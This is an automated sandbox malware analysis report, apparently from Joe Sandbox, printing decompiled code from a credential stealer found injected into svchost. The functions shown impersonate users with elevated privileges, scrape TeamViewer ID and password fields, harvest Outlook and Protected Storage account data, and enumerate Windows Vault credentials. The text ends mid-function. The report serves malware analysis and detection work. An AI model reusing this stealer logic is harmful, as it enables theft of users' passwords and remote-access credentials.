                                                                                                                                        0x0bc01715
                                                                                                                                        0x0bc01718
                                                                                                                                        0x0bc0171f
                                                                                                                                        0x0bc01722
                                                                                                                                        0x0bc01725
                                                                                                                                        0x0bc01728
                                                                                                                                        0x0bc0172b
                                                                                                                                        0x0bc01733
                                                                                                                                        0x0bc0174a
                                                                                                                                        0x0bc01735
                                                                                                                                        0x0bc01735
                                                                                                                                        0x0bc0173a
                                                                                                                                        0x0bc0173c
                                                                                                                                        0x0bc0173c
                                                                                                                                        0x0bc01741
                                                                                                                                        0x0bc01741
                                                                                                                                        0x0bc01758
                                                                                                                                        0x0bc0175a
                                                                                                                                        0x0bc0175f
                                                                                                                                        0x0bc01765
                                                                                                                                        0x0bc01765
                                                                                                                                        0x0bc01772
                                                                                                                                        0x0bc0177a
                                                                                                                                        0x0bc0177a
                                                                                                                                        0x0bc01783
                                                                                                                                        0x0bc01675
                                                                                                                                        0x0bc01681
                                                                                                                                        0x0bc016a4
                                                                                                                                        0x0bc016c8
                                                                                                                                        0x0bc016cb
                                                                                                                                        0x0bc016d1
                                                                                                                                        0x0bc016d4
                                                                                                                                        0x0bc016de
                                                                                                                                        0x0bc016e8
                                                                                                                                        0x0bc016ec
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016ee
                                                                                                                                        0x0bc016f9
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016fb
                                                                                                                                        0x0bc016fe
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016fe
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016f9
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016a6
                                                                                                                                        0x0bc016b4
                                                                                                                                        0x0bc016b6
                                                                                                                                        0x0bc016bb
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016bd
                                                                                                                                        0x0bc016c0
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc016c5
                                                                                                                                        0x0bc016bb
                                                                                                                                        0x0bc016a4
                                                                                                                                        0x0bc01646
                                                                                                                                        0x0bc0164a
                                                                                                                                        0x0bc01652
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01652
                                                                                                                                        0x0bc01789
                                                                                                                                        0x0bc01789
                                                                                                                                        0x0bc0178b
                                                                                                                                        0x0bc01797

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC09B51: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0BC09B73
                                                                                                                                          • Part of subcall function 0BC09B51: GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B83
                                                                                                                                          • Part of subcall function 0BC09B51: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B8A
                                                                                                                                          • Part of subcall function 0BC09B51: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 0BC09BBA
                                                                                                                                          • Part of subcall function 0BC09B51: CloseHandle.KERNEL32(?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09BCA
                                                                                                                                        • lstrcmpiA.KERNEL32(03206648,?), ref: 0BC0164A
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,?), ref: 0BC01668
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC01684
                                                                                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,00000009,00000000), ref: 0BC0169C
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,00000009,00000002,00000000,?), ref: 0BC016B4
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,500BC0D3,00000002,00000000,?), ref: 0BC016E8
                                                                                                                                        • LoadUserProfileA.USERENV(?,00000020), ref: 0BC0172B
                                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 0BC01750
                                                                                                                                        • RevertToSelf.ADVAPI32 ref: 0BC0175F
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0BC0177A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0BC01783
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: User$Logon$CloseHandleProcessProfileToken$AdjustCurrentFreeImpersonateLoadLocalLoggedLookupOpenPrivilegePrivilegesRevertSelfStringUnloadValuelstrcmpilstrlen
                                                                                                                                        • String ID: $SeAssignPrimaryTokenPrivilege$SeBackupPrivilege$SeChangeNotifyPrivilege$SeCreateTokenPrivilege$SeImpersonatePrivilege$SeIncreaseQuotaPrivilege$SeRestorePrivilege$SeTcbPrivilege
                                                                                                                                        • API String ID: 4267542777-3650065877
                                                                                                                                        • Opcode ID: eabcc6bc4419709b07787e395f7c4e9f4bac18055a044f2d9d9abc7639637f12
                                                                                                                                        • Instruction ID: 2688def369b826e0bb415bcdc4bccbbd9e3b57f490e3da98be45c5f6b1bed1dd
                                                                                                                                        • Opcode Fuzzy Hash: eabcc6bc4419709b07787e395f7c4e9f4bac18055a044f2d9d9abc7639637f12
                                                                                                                                        • Instruction Fuzzy Hash: A95115B1D20209EFDF219F9AE849A9EFBF9FF44704F244559E211B6290DB719A80DF10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 4.31%

                                                                                                                                        Function 0BC06F5F, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 166memorywindowUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E0BC06F5F(void* __edx, void* __eflags, intOrPtr _a4) {
				struct HWND__* _v8;
				void* _v12;
				void* _v16;
				struct HWND__* _v20;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				intOrPtr _t38;
				struct HWND__* _t42;
				struct HWND__* _t48;
				struct HWND__* _t49;
				struct HWND__* _t50;
				int _t51;
				char* _t52;
				struct HWND__* _t66;
				long _t67;
				void* _t80;
				int _t86;
				void* _t89;

				_t38 = E0BC08C9C(_a4, __edx, __eflags, 0x86);
				_pop(_t80);
				_push(0xc0);
				_t86 = 0x40;
				_v28 = _t38;
				_v12 = LocalAlloc(_t86, ??);
				_v16 = LocalAlloc(_t86, 0xc0);
				_v24 = LocalAlloc(_t86, 0xc0);
				_t42 = FindWindowExA(0, 0, 0, "TeamViewer"); // executed
				if(_t42 == 0) {
					L13:
					E0BC08D0C(_a4, _v28, _t97);
					E0BC08D3D(_v12);
					E0BC08D3D(_v16);
					return E0BC08D3D(_v24);
				}
				_t48 = FindWindowExA(_t42, 0, "#32770", 0);
				_v20 = _t48;
				if(_t48 == 0) {
					goto L13;
				}
				_t49 = FindWindowExA(_t48, 0, "Edit", 0);
				_v8 = _t49;
				if(_t49 == 0) {
					_push(0);
					_push(0);
					_push(0);
					while(1) {
						_t50 = FindWindowExA(_v20, ??, ??, ??);
						_v8 = _t50;
						__eflags = _t50;
						if(__eflags == 0) {
							break;
						}
						_t51 = GetClassNameA(_v8, _v24, _t86);
						__eflags = _t51;
						if(_t51 == 0) {
							L9:
							_push(0);
							_push(0);
							_push(_v8);
							continue;
						}
						_t52 = StrStrIA(_v24, "ATL");
						__eflags = _t52;
						if(_t52 == 0) {
							SendMessageW(_v8, 0xd, _t86, 0xbc0e554);
							_v12 = E0BC09BE0(_t80, 0xbc0e554, 0xffffffff);
							E0BC08D3D(0xbc0e554);
							SendMessageW(FindWindowExA(_v20, _v8, 0, 0), 0xd, 0x40, 0xbc0e554);
							_v16 = E0BC09BE0(_t80, 0xbc0e554, 0xffffffff);
							E0BC08D3D(0xbc0e554);
							_t84 = _a4;
							_v20 = 0xbeef0000;
							E0BC08A41( &_v20, _t80, _a4, 4);
							E0BC08C6D(_a4, _t80, _v12);
							E0BC08C6D(_t84, _t80, _v16);
							_t89 = _t89 + 0x24;
							goto L13;
						}
						goto L9;
					}
				} else {
					SendMessageA(_t49, 0xd, _t86, _v12);
					_t66 = FindWindowExA(_v20, _v8, "Edit", 0);
					if(_t66 != 0) {
						_t67 = SendMessageA(_t66, 0xd, 0x40, _v16);
						_t97 = _t67;
						if(_t67 != 0) {
							_t85 = _a4;
							_v20 = 0xbeef0000;
							E0BC08A41( &_v20, _t80, _a4, 4);
							E0BC08C6D(_a4, _t80, _v12);
							E0BC08C6D(_t85, _t80, _v16);
							_t89 = _t89 + 0xc;
						}
					}
				}
			}























                                                                                                                                        0x0bc06f70
                                                                                                                                        0x0bc06f7b
                                                                                                                                        0x0bc06f81
                                                                                                                                        0x0bc06f84
                                                                                                                                        0x0bc06f86
                                                                                                                                        0x0bc06f8d
                                                                                                                                        0x0bc06f94
                                                                                                                                        0x0bc06fa9
                                                                                                                                        0x0bc06fac
                                                                                                                                        0x0bc06fb0
                                                                                                                                        0x0bc070f6
                                                                                                                                        0x0bc070fc
                                                                                                                                        0x0bc07104
                                                                                                                                        0x0bc0710c
                                                                                                                                        0x0bc07120
                                                                                                                                        0x0bc07120
                                                                                                                                        0x0bc06fbe
                                                                                                                                        0x0bc06fc0
                                                                                                                                        0x0bc06fc5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06fd3
                                                                                                                                        0x0bc06fd5
                                                                                                                                        0x0bc06fda
                                                                                                                                        0x0bc07043
                                                                                                                                        0x0bc07044
                                                                                                                                        0x0bc07045
                                                                                                                                        0x0bc07070
                                                                                                                                        0x0bc07073
                                                                                                                                        0x0bc07075
                                                                                                                                        0x0bc07078
                                                                                                                                        0x0bc0707a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0704f
                                                                                                                                        0x0bc07055
                                                                                                                                        0x0bc07057
                                                                                                                                        0x0bc0706b
                                                                                                                                        0x0bc0706b
                                                                                                                                        0x0bc0706c
                                                                                                                                        0x0bc0706d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0706d
                                                                                                                                        0x0bc07061
                                                                                                                                        0x0bc07067
                                                                                                                                        0x0bc07069
                                                                                                                                        0x0bc07090
                                                                                                                                        0x0bc0709b
                                                                                                                                        0x0bc0709e
                                                                                                                                        0x0bc070b8
                                                                                                                                        0x0bc070c3
                                                                                                                                        0x0bc070c6
                                                                                                                                        0x0bc070cb
                                                                                                                                        0x0bc070d3
                                                                                                                                        0x0bc070da
                                                                                                                                        0x0bc070e4
                                                                                                                                        0x0bc070ee
                                                                                                                                        0x0bc070f3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc070f3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07069
                                                                                                                                        0x0bc06fdc
                                                                                                                                        0x0bc06fe9
                                                                                                                                        0x0bc06ff7
                                                                                                                                        0x0bc06ffb
                                                                                                                                        0x0bc07009
                                                                                                                                        0x0bc0700b
                                                                                                                                        0x0bc0700d
                                                                                                                                        0x0bc07013
                                                                                                                                        0x0bc0701b
                                                                                                                                        0x0bc07022
                                                                                                                                        0x0bc0702c
                                                                                                                                        0x0bc07036
                                                                                                                                        0x0bc0703b
                                                                                                                                        0x0bc0703b
                                                                                                                                        0x0bc0700d
                                                                                                                                        0x0bc06ffb

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F89
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F90
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F97
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,00000000,TeamViewer), ref: 0BC06FAC
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 0BC06FBE
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 0BC06FD3
                                                                                                                                        • SendMessageA.USER32(00000000,0000000D,00000040,?), ref: 0BC06FE9
                                                                                                                                        • FindWindowExA.USER32(?,?,Edit,00000000), ref: 0BC06FF7
                                                                                                                                        • SendMessageA.USER32(00000000,0000000D,00000040,?), ref: 0BC07009
                                                                                                                                          • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
                                                                                                                                        • FindWindowExA.USER32(?,00000000,00000000,00000000), ref: 0BC07073
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindWindow$AllocLocal$MessageSend$lstrlen
                                                                                                                                        • String ID: #32770$ATL$Edit$TeamViewer
                                                                                                                                        • API String ID: 3493446068-4057567464
                                                                                                                                        • Opcode ID: f8a4cbdceacb77968db407f9164c01936af883f031721ff24900da2acfb6eaef
                                                                                                                                        • Instruction ID: cdce75e9f46029fe121bd25e3e9883ad297908593716a1f56a88320794e40eba
                                                                                                                                        • Opcode Fuzzy Hash: f8a4cbdceacb77968db407f9164c01936af883f031721ff24900da2acfb6eaef
                                                                                                                                        • Instruction Fuzzy Hash: B35151B1E70219BEDF106BE58C85EAF7B7DEF44294F104961F610B21D0DE759E10ABA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC06007, Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 146libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E0BC06007(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				struct HINSTANCE__* _t38;
				void* _t44;
				_Unknown_base(*)()* _t60;
				intOrPtr* _t63;
				CHAR* _t65;
				void* _t78;
				void* _t86;
				intOrPtr* _t87;
				void* _t88;

				_t78 = __edx;
				_t32 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\uARbvvr\\uT1 s33vAQR TDQD5Hp\\s33vAQRg");
				_v48 = _t32;
				_t65 = " ";
				_v12 = _t32;
				if(_t32 == 0) {
					_v12 = _t65;
				}
				_t33 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\kLQEv9g Ke\\JAppHQRaHpgLvQ\\kLQEv9g THggD5LQ5 6AfgwgRHO\\Ipv2LbHg\\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g");
				_v44 = _t33;
				_v16 = _t33;
				if(_t33 == 0) {
					_v16 = _t65;
				}
				_t34 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\kLQEv9g Ke\\JAppHQRaHpgLvQ\\kLQEv9g THggD5LQ5 6AfgwgRHO\\Ipv2LbHg\\uARbvvr");
				_v40 = _t34;
				_v20 = _t34;
				if(_t34 == 0) {
					_v20 = _t65;
				}
				_t35 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\h8.G\\uARbvvr\\Ipv2LbHg\\uARbvvr");
				_v36 = _t35;
				_v24 = _t35;
				if(_t35 == 0) {
					_v24 = _t65;
				}
				_t36 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\hW.G\\uARbvvr\\Ipv2LbHg\\uARbvvr");
				_v32 = _t36;
				_v28 = _t36;
				_t95 = _t36;
				if(_t36 == 0) {
					_v28 = _t65;
				}
				_t84 = _a4;
				_t86 = E0BC08C9C(_a4, _t78, _t95, 0x5e);
				 *_t87 = "Pstorec.dll";
				_t38 = LoadLibraryA(??);
				if(_t38 != 0) {
					_t60 = GetProcAddress(_t38, "PStoreCreateInstance");
					_push(0);
					_push(0);
					_push(0);
					_push( &_v8);
					if( *_t60() >= 0 && _v8 != 0) {
						E0BC04A80(_t84, _v8, E0BC05E3A);
						_t63 = _v8;
						_t87 = _t87 + 0xc;
						 *((intOrPtr*)( *_t63 + 8))(_t63);
					}
				}
				E0BC05B39("Software\\Microsoft\\Internet Account Manager\\Accounts", _t78, _t84, "Software\\Microsoft\\Internet Account Manager\\Accounts"); // executed
				_t68 = E0BC08EE2("Software\\Microsoft\\Internet Account Manager\\Accounts", "\\");
				E0BC05C29(_t41, _t41, _t78, _t84, "Identities"); // executed
				E0BC08D3D(_t41);
				_t44 = E0BC08DDA(_t86, 0x80000002, "Software\\Microsoft\\Internet Account Manager", "Outlook", 0, 0); // executed
				_t88 = _t87 + 0x2c;
				if(_t44 != 0) {
					_t68 = E0BC08F32(_t44, "\\Accounts");
					E0BC05B39(_t57, _t78, _t84, _t57);
					E0BC08D3D(_t57);
					_t88 = _t88 + 0x14;
				}
				E0BC05B39(_t68, _t78, _t84, _v12); // executed
				E0BC05C29(_t68, 0, _t78, _t84, _v16); // executed
				E0BC05C29(_t68, 0, _t78, _t84, _v20); // executed
				E0BC05C29(_t68, 0, _t78, _t84, _v24); // executed
				E0BC05C29(_t68, 0, _t78, _t84, _v28); // executed
				E0BC08D0C(_t84, _t86, 0);
				LocalFree(_v32);
				LocalFree(_v36);
				LocalFree(_v40);
				LocalFree(_v44);
				return LocalFree(_v48);
			}































                                                                                                                                        0x0bc06007
                                                                                                                                        0x0bc06015
                                                                                                                                        0x0bc0601a
                                                                                                                                        0x0bc0601d
                                                                                                                                        0x0bc06022
                                                                                                                                        0x0bc06027
                                                                                                                                        0x0bc06029
                                                                                                                                        0x0bc06029
                                                                                                                                        0x0bc06031
                                                                                                                                        0x0bc06036
                                                                                                                                        0x0bc06039
                                                                                                                                        0x0bc0603e
                                                                                                                                        0x0bc06040
                                                                                                                                        0x0bc06040
                                                                                                                                        0x0bc06048
                                                                                                                                        0x0bc0604d
                                                                                                                                        0x0bc06050
                                                                                                                                        0x0bc06055
                                                                                                                                        0x0bc06057
                                                                                                                                        0x0bc06057
                                                                                                                                        0x0bc0605f
                                                                                                                                        0x0bc06064
                                                                                                                                        0x0bc06067
                                                                                                                                        0x0bc0606c
                                                                                                                                        0x0bc0606e
                                                                                                                                        0x0bc0606e
                                                                                                                                        0x0bc06076
                                                                                                                                        0x0bc0607b
                                                                                                                                        0x0bc0607e
                                                                                                                                        0x0bc06081
                                                                                                                                        0x0bc06083
                                                                                                                                        0x0bc06085
                                                                                                                                        0x0bc06085
                                                                                                                                        0x0bc06088
                                                                                                                                        0x0bc06094
                                                                                                                                        0x0bc06096
                                                                                                                                        0x0bc0609d
                                                                                                                                        0x0bc060a7
                                                                                                                                        0x0bc060af
                                                                                                                                        0x0bc060b5
                                                                                                                                        0x0bc060b6
                                                                                                                                        0x0bc060b7
                                                                                                                                        0x0bc060bb
                                                                                                                                        0x0bc060c0
                                                                                                                                        0x0bc060d0
                                                                                                                                        0x0bc060d5
                                                                                                                                        0x0bc060da
                                                                                                                                        0x0bc060de
                                                                                                                                        0x0bc060de
                                                                                                                                        0x0bc060c0
                                                                                                                                        0x0bc060e8
                                                                                                                                        0x0bc060f9
                                                                                                                                        0x0bc06103
                                                                                                                                        0x0bc06109
                                                                                                                                        0x0bc06121
                                                                                                                                        0x0bc06126
                                                                                                                                        0x0bc0612b
                                                                                                                                        0x0bc06138
                                                                                                                                        0x0bc0613c
                                                                                                                                        0x0bc06142
                                                                                                                                        0x0bc06147
                                                                                                                                        0x0bc06147
                                                                                                                                        0x0bc0614e
                                                                                                                                        0x0bc06159
                                                                                                                                        0x0bc06164
                                                                                                                                        0x0bc0616f
                                                                                                                                        0x0bc0617a
                                                                                                                                        0x0bc06186
                                                                                                                                        0x0bc06194
                                                                                                                                        0x0bc06199
                                                                                                                                        0x0bc0619e
                                                                                                                                        0x0bc061a3
                                                                                                                                        0x0bc061ae

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC088C9: lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
                                                                                                                                          • Part of subcall function 0BC088C9: LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
                                                                                                                                          • Part of subcall function 0BC088C9: lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
                                                                                                                                        • LoadLibraryA.KERNEL32(0000005E), ref: 0BC0609D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0BC060AF
                                                                                                                                          • Part of subcall function 0BC05C29: RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05C61
                                                                                                                                          • Part of subcall function 0BC05C29: RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05D0B
                                                                                                                                          • Part of subcall function 0BC05C29: RegCloseKey.ADVAPI32(?), ref: 0BC05D17
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC06194
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC06199
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC0619E
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC061A3
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC061A8
                                                                                                                                        Strings
                                                                                                                                        • Identities, xrefs: 0BC060FB
                                                                                                                                        • PStoreCreateInstance, xrefs: 0BC060A9
                                                                                                                                        • Software\Microsoft\Internet Account Manager, xrefs: 0BC06117
                                                                                                                                        • Pstorec.dll, xrefs: 0BC06096
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\hW.G\uARbvvr\Ipv2LbHg\uARbvvr, xrefs: 0BC06071
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\uARbvvr, xrefs: 0BC06043
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g, xrefs: 0BC0602C
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\h8.G\uARbvvr\Ipv2LbHg\uARbvvr, xrefs: 0BC0605A
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg, xrefs: 0BC06010
                                                                                                                                        • Outlook, xrefs: 0BC06112
                                                                                                                                        • \Accounts, xrefs: 0BC0612D
                                                                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0BC060E1, 0BC060E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Local$Free$AddressAllocCloseEnumLibraryLoadOpenProclstrcpylstrlen
                                                                                                                                        • String ID: 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g$6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\h8.G\uARbvvr\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\hW.G\uARbvvr\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg$Identities$Outlook$PStoreCreateInstance$Pstorec.dll$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$\Accounts
                                                                                                                                        • API String ID: 793178860-2718115194
                                                                                                                                        • Opcode ID: 351eaf3ff6691b5f22d23302e0822f6aa8e42089d195fded95e2404c4e82b2fa
                                                                                                                                        • Instruction ID: 59bbca871870937cea84bab05b04f6b05cf9a146f61a11dd1987199561f02a25
                                                                                                                                        • Opcode Fuzzy Hash: 351eaf3ff6691b5f22d23302e0822f6aa8e42089d195fded95e2404c4e82b2fa
                                                                                                                                        • Instruction Fuzzy Hash: 7741A570E70206AFDF017FB58C8296FBAB9EF58244F104479E505F61C0DE718A41AB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC0526C, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 186libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 328 bc0526c-bc0529a LoadLibraryA 329 bc052a0-bc05322 GetProcAddress * 7 328->329 330 bc05538-bc05546 call bc09fdc 328->330 329->330 334 bc05328 329->334 335 bc0532e-bc0534b 334->335 337 bc05351-bc05364 335->337 338 bc05519-bc05532 335->338 339 bc05370-bc05372 337->339 338->330 338->335 339->338 340 bc05378-bc05384 339->340 341 bc0538a-bc05390 340->341 342 bc0550d 340->342 343 bc05396-bc053c3 call bc08d5e GetVersionExA 341->343 342->338 346 bc053c5-bc053cc 343->346 347 bc053ce-bc053d5 343->347 346->347 348 bc053e8-bc05402 call bc08d75 346->348 349 bc0546a-bc05484 call bc08d75 347->349 350 bc053db-bc053e2 347->350 355 bc054e7-bc05507 348->355 356 bc05408-bc0543b 348->356 349->355 357 bc05486-bc054b8 349->357 350->348 350->349 355->342 355->343 356->355 360 bc05441-bc05468 call bc04bbb 356->360 357->355 361 bc054ba-bc054db call bc04bbb 357->361 366 bc054e1 360->366 361->366 366->355
                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                        			E0BC0526C(intOrPtr _a4) {
				signed int _v12;
				struct _OSVERSIONINFOA _v168;
				_Unknown_base(*)()* _v172;
				struct HINSTANCE__* _v176;
				_Unknown_base(*)()* _v180;
				struct HINSTANCE__* _v184;
				_Unknown_base(*)()* _v188;
				char _v192;
				struct HINSTANCE__* _v196;
				struct HINSTANCE__* _v200;
				struct HINSTANCE__* _v204;
				char _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				_Unknown_base(*)()* _v228;
				_Unknown_base(*)()* _v232;
				char _v236;
				_Unknown_base(*)()* _v240;
				_Unknown_base(*)()* _v244;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t87;
				_Unknown_base(*)()* _t94;
				intOrPtr _t114;
				intOrPtr _t123;
				struct HINSTANCE__* _t129;
				intOrPtr _t136;
				intOrPtr _t137;
				CHAR* _t141;
				void* _t142;
				signed int _t145;
				void* _t146;

				_t87 =  *0xbc10000; // 0xbb40e64e
				_v12 = _t87 ^ _t145;
				_v216 = _a4;
				_t90 = LoadLibraryA("vaultcli.dll"); // executed
				_t129 = _t90;
				if(_t129 != 0) {
					_t142 = GetProcAddress;
					_v240 = GetProcAddress(_t129, "VaultEnumerateItems");
					_v172 = GetProcAddress(_t129, "VaultEnumerateVaults");
					_t94 = GetProcAddress(_t129, "VaultFree");
					_t141 = "VaultGetItem";
					_v180 = _t94;
					_v232 = GetProcAddress(_t129, _t141);
					_v228 = GetProcAddress(_t129, _t141);
					_v244 = GetProcAddress(_t129, "VaultOpenVault");
					GetProcAddress(_t129, "VaultCloseVault");
					_t129 = 0;
					_t90 = _v172(0,  &_v220,  &_v236);
					_v172 = 0;
					if(_v220 > 0) {
						_v188 = 0;
						do {
							_push( &_v192);
							_push(_t129);
							_push(_v188 + _v236); // executed
							if(_v244() == 0) {
								_push( &_v208);
								_push( &_v224);
								_push(0x200);
								_push(_v192);
								if(_v240() == 0) {
									_v176 = _t129;
									if(_v224 > _t129) {
										_v200 = _t129;
										_v184 = _t129;
										do {
											E0BC08D5E( &_v268,  &_v268, _t129, 0x18);
											_v168.dwOSVersionInfoSize = 0x94;
											GetVersionExA( &_v168);
											if(_v168.dwPlatformId != 2 || _v168.dwMajorVersion <= 6) {
												if(_v168.dwMinorVersion <= 1 || _v168.dwMajorVersion != 6) {
													_t142 = _v200 + _v208;
													if(E0BC08D75(_t142, 0xbc10014) != 0) {
														_t137 =  *((intOrPtr*)(_t142 + 0x18));
